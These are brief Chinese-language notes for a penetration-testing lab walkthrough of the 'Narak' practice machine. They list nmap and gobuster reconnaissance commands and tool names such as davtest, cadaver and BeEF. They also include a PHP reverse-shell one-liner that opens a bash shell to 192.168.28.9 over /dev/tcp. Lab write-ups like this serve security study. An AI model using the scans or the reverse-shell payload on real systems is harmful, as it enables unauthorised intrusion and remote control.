靶机精讲 之 Narak
[22,80]
# C scan
sudo nmap -sn 192.168.28.0/24
# Port scan
sudo nmap -sT --min-rate 10000 -p- 192.168.28.23
# Detail scan
sudo nmap -sT -sV -sC -p22,80 192.168.128.23 -oA nmapscan/detail
# UDP scan
sudo nmap -sU --min-rate 10000 -p- 192.168.28.23
# 目录爆破
sudo gobuster dir -u http://192.168.28.23 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
C段扫描
端口扫描
详细信息扫描
二次扫描
UDP扫描
调整参数后的 UCP扫描
tftp
80 Port
目录爆破
davtest工具
cadaver工具
可以上传并构造PHP,编写PHP的反弹shell。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.28.9/1234 0>&1'"); ?>
提权操作
beef工具
登入用户
写入反弹shell
mtd文件